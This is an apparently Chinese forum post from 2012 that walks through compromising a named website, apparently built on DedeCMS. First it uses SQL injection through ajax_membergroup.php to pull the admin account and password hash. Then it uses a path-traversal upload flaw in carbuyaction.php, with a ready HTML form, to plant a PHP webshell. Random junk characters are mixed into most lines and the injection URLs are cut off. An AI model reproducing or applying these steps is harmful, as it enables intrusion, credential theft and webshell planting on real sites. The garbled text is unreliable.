①注入漏洞。6 E' d5 S" _2 L+ E" L( I. w; R
这站 http://www.political-security.com/
9 v( G$ y( u8 b2 o& d首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,0 {# z5 U9 m! b$ E4 P. m: e5 w* B
www.political-security.com/data/mysql_error_trace.inc 爆后台, _; N2 U. m% D" x; {% i$ s
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。2 _; m9 d9 v9 C& o d9 ~: H
然后写上语句
* a, g# K. w w! M& X" W! s- X查看管理员帐号$ s) `1 r1 G1 x' o: a3 |
http://www.political-security.co ... &membergroup=@`2 _: r$ G% l2 i3 a2 A5 D7 \
+ }) r* P$ v2 ~* f0 |. a
admin
) t0 x0 Q9 @5 f: u; ~8 I, R! j }2 D' S8 J" Q; i; b
查看管理员密码
N5 D$ ~' f+ k5 `4 M http://www.political-security.co ... &membergroup=@`
, S5 ^" @0 b# _, c+ i: B. l$ F- M4 q; y. X5 B/ X
8d29b1ef9f8c5a5af429. _2 M3 ]* b% X `! N
" V: y$ ?& Z2 D7 m) P. Y' A. L. v* _查看管理员密码
K- p' ?; M$ Y( k2 u2 p
. u" j6 e5 C/ P/ D8 W0 g2 }% v得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
2 D5 O( ^2 j+ D/ j. t1 J
& ~- L$ @8 p3 u" C8d2* g: _$ x+ u! ~# V
9b1ef9f8c5a5af42' G+ [/ A: g+ w7 N3 X5 n" a
9
3 ?% x/ `, Y( v7 f8 Q Y/ Q& [* }6 L7 l( t# S
cmd5没解出来 只好测试第二个方法9 S, S7 d, N/ u9 X( B- \5 a) Y+ W2 S1 e
: l, U% E. B6 C5 M( B8 x+ N' Q8 ?% Z6 ^7 D, h
②上传漏洞:
8 L& f8 z- s; d: A! m0 H, g$ b& x# [2 l: X. u( q+ _
只要登陆会员中心,然后访问页面链接
2 ^% F9 f) b% E. z1 ~$ Q“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”4 F: h! `& r& g" }
1 l8 U( G+ u$ Z0 O; t* t( A( w8 q
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
( y0 a, }6 ?$ M8 H8 q- t& c1 @- N2 I! `# a
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm/ ]9 ?) ^7 f' ]6 J( y9 y; U
3 d; E4 G* P# C* z6 U4 I
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
2 W3 y6 V! H" n1 {或者
; A$ ~; o8 O( W即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对